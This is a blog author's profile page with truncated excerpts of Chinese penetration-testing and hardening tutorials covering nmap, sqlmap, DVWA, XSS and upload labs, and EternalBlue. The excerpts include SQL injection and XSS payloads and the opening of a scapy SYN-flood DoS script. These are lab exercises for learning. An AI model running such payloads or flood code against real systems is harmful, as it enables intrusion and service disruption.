自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(21)
  • 收藏
  • 关注

原创 PyCharm idea phpstrom Mac办法打开,重装没用解决方案适用于jetbrains全家桶

Mac 无法启动 pycharm idea 等je软件终极解决方案

2022-10-17 12:03:51 222 1

原创 linux加固以及常用命令使用方法

linux加固用户管理添加用户删除用户修改密码添加一个不可登陆的用户组管理增加组删除组修改用户的组文件service 服务管理查看服务名用户管理添加用户useradd a 删除用户userdel a -r 删除主目录修改密码passwd a添加一个不可登陆的用户useradd user1 -s /sbin/ nologin -M组管理增加组groupadd w删除组groupdel w修改用户的组usermod -g w user1文件touch 创建文件

2021-06-12 10:06:19 261

原创 windows常用加固

Windows加固加固加固windows常见目录system32 存放系统配置文件SysWOW64 Windows操作系统的子系统Config/SAM 存放windows帐号和密码etc/hosts DNS解析文件Program files/ Program files (x86) 64位系统安装在Windows操作系统的子系统,32位下会安装在x86下 Perflogs 日志目录windows常用系统命令ver 查看系统版本hostname 查看主机名ipconfig /all 查看

2021-06-11 11:06:40 261

原创 账号及安全策略加固

账号及安全策略账号及安全策略禁用guest日志安全设置安全选项策略设置安全选项策略设置用户权限策略设置权限设置账号及安全策略温馨提示mmc打开控制台第一部创建用户账号安全设置设置方法:“开始”—“运行”输入secpol.msc(控制面板——管理工具)立即生效:gpupdate /force账号策略密码必须符合复杂性要求:启用密码长度最小值 8个字符密码最长使用期限: 30天强制密码历史: 3个记住的密码账号锁定帐户锁定阀值: 3次无效登陆帐户锁定时间: 30分钟复位帐户锁定

2021-06-02 15:13:33 700

原创 常见信息收集方法

常见收集方法pingarpingfpinghping3NpingNbtscan指纹识别pingping 通过icmp协议来ping-t windows下表示无限ping, linux表示设置ttl值-c ping的次数,windows默认4次,Linux默认是无限ping-s 载包大小,linux下用-l 载包大小,windows下用-f 快速ping-i 设置多少秒ping一次ping 192.168.167.1 -t -farpingARP协议是“Address Resolu

2021-06-01 16:50:51 519

原创 渗透测试(侦查)一站式教程

侦察一站式教程使用 Nmap 扫描和识别服务识别 Web 应用防火墙查找web目录dirb使用 Nmap 扫描和识别服务Nmap 可能是世界上最广泛使用的端口扫描器。他可以用于识别活动主机、扫描 TCP 和 UDP 开放端口,检测防火墙,获得运行在远程主机上的服务版本,甚至是,可以使用脚本来发现和利用漏洞。首先,我们打算看看服务器是否响应 ping,或者服务器是否打开:nmap -sn 192.168.2.252. 现在,我们要让 Nmap 向服务器询问正在运行的服务的版本,并且基于

2021-05-30 22:18:07 580 1

原创 sqlmap全套使用教程

sqlmap全套使用教程实验环境sqlmap常见指令命令使用篇实战篇布尔盲注/时间盲注-r实验环境windows10+python3.9+sqlmap+sqli2sqlmap常见指令sqlmap常用参数:目标:必须得有-u : 指定目标URL,sql注入点请求:这些选项可用于指定如何连接到目标URL–data=DATA 数据字符串通过POST发送–cookie=“COOKIE” HTTP Cookie的值–random-agent 随机选择 HTTP User-Agent 头的值–p

2021-05-26 17:17:00 1467

原创 Maltego详细安装及使用教程

Maltego安装信息收集安装kali自带首先我们找到这个并且进去然后进行注册这一步需要科学才行然后登录信息收集

2021-05-24 11:33:33 2004 2

原创 beef-xss软件使用教程

beef-xss教程实验环境打开beefxss登录 dvwa难度调到low实验环境beef-xss+kali2021打开beefxss打开对应的网址并登录http://192.168.2.157:3000/ui/panel然后我们回到虚拟机找到hook地址登录 dvwa难度调到low

2021-05-24 09:36:56 734

原创 scapy dos攻击

python3 亲测打爆服务器import randomfrom scapy.all import * # scapy模块import sysimport threadingimport randomglobal idef synFlooi(tgt, dPort, k): # 自定义函数 i = 1 while True: srcList = [ '192' + '.' + str(random.randrange(254))

2021-05-16 21:09:43 817

转载 kali密码破解工具

medusha(美杜莎)medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是,medusa的稳定性相较于hydra要好很多但是支持的模块相对于hydra少一些。二、语法参数medusha [-h host|-H file] [-u username | -U file] [-p password | -P file] [-C file] -M modudle [OPT]-h

2021-05-16 11:54:08 2105

原创 sql常用命令

sql常用命令http://192.168.167.165/dvwa/vulnerabilities/sqli/?id=1' union select database(),group_concat(table_name) from information_schema.tables where table_schema=database() %23&Submit=Submit#查找当前库里面的所有的表id=1 union select 1,group_concat(schema_name)

2021-05-14 14:37:18 67

原创 dvwa通关教程超详细

dvwa通关教程实验环境Brute Forcelow实验环境burp+win10+php 5.3+python3关于burpsuite全套使用教程点此Brute Forcelow先随便输入一个账号密码

2021-05-12 17:45:50 12662 1

原创 burpsuite全套使用教程

burpsuite实验环境安装教程实验环境burpsuite1.733 +win10 +dvwa安装教程第一步打开我们下载的文件找到jdk,一路回车傻瓜式安装直接下一步出现这个界面就是安装完成打开这个打开后点击run把这个复制过去然后点这个最后把这个复制过去复制这个到软件里去大功告成...

2021-05-09 21:25:06 31339 6

原创 wireshark抓ssh,telnet,dns等教程

wireshark使用教程实验环境三次握手四次挥手实验环境WIN10+wireshark三次握手四次挥手因为最后一次握手和倒数第二次握手整合信息一起发送了所以抓不到

2021-05-08 21:56:30 1032 1

原创 nmap使用教程详细

nmap使用教程实验环境内网探测主机渗透实验环境centos 7+ nmap内网探测nmap -sP 192.168.167.1/24 -oG output.txtsP 使用ping探测 oG保存文件其中ip地址改成自己的即可我们知道这个网段有10个ip存活的在打开output文件可以输出存活的主机nmap -sn 192.168.2.1/24(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态)依然是10台主机nmap -sU 192.168.2.1udp

2021-05-08 12:16:38 504

原创 linux 常用命令

环境centos7 64位文本类型操作命令1、ls:显示当前文件夹下的子文件夹和文件 -l -a2、pwd:显示当前目录3、cd:改变当前目录命令4、Cat:显示文件内容到屏幕上 -n5、Head:显示文件开头的10行到屏幕上6、Tail:显示文件的末尾部分到屏幕上7、Wc:显示文件的文件行数,单词数,字节数8、More:分页显示文件内容到屏幕上9、Less:more的增强版,可以翻半页10、Touch:创建一个新文件11、Mkdir:创建一个新目录12、Rmdir:删除一个空

2021-05-08 09:55:19 96 1

原创 使用永恒之蓝漏洞攻击电脑

关于实验环境实验步骤第一步打开终端第二步启动nmap第三步 找到可以攻击的电脑第四步 启动msfconsole实验环境win7电脑一台(其中一台必须可以被永恒之蓝攻击)kali 系统电脑一台实验步骤第一步打开终端第二步启动nmap输入一下命令nmap -sV 192.168.167.1/24我们这里是探测整个网段的ip地址是整个网段的第三步 找到可以攻击的电脑这个电脑开了445端口第四步 启动msfconsole输入一下指令我们设置一下被肉鸡的ip开干入侵成功

2021-04-06 15:05:59 364

原创 dvwa csrf通关之旅

csrf通关之旅前言lowMediumhigh前言准备环境 dvwa phpstudy bur 客户机low首先我们尝试修改一次名字我们发现是用get方式提交的然后我们换一个浏览器我们刚刚把密码修改成123456现在我想修改成54321?password_new=123456&password_conf=123456&Change=Change#?password_new=54321&password_conf=54321&Change=Change#

2021-04-01 15:31:46 106

原创 xss闯关记录 1-10超详细

xss挑战过关教程挑战关卡准备环境第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关准备环境首先需要一个 xss通关挑战源码 需要准备一个PHPstuday 最后需要一台可以正常联网的电脑第一关没有任何保护随便一条脚本语句均可<a href=javascript:/00/,alert(%22M%22)>M</a>第二关"> <a href=javascript:/00/,alert(%22M%22)>M</a>//对比

2021-03-31 16:52:24 568

原创 upload-labs通关教程

upload-labs通关教程这回是我第一次写博客记录自己的通关教程废话不说开干通关教程准备环境less-1less-2less-3less-4less-5less-6less-7less-8less-9less-10less-11准备环境upload网站+burpsuite+火狐渗透版less-1首先我们发现第一关上传类型不能是php查看前端HTML代码我们发现我们可以改成var allow_ext = ".jpg|.png|.gif|.php":另一种作法将php改成png

2021-03-30 14:00:16 2302 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除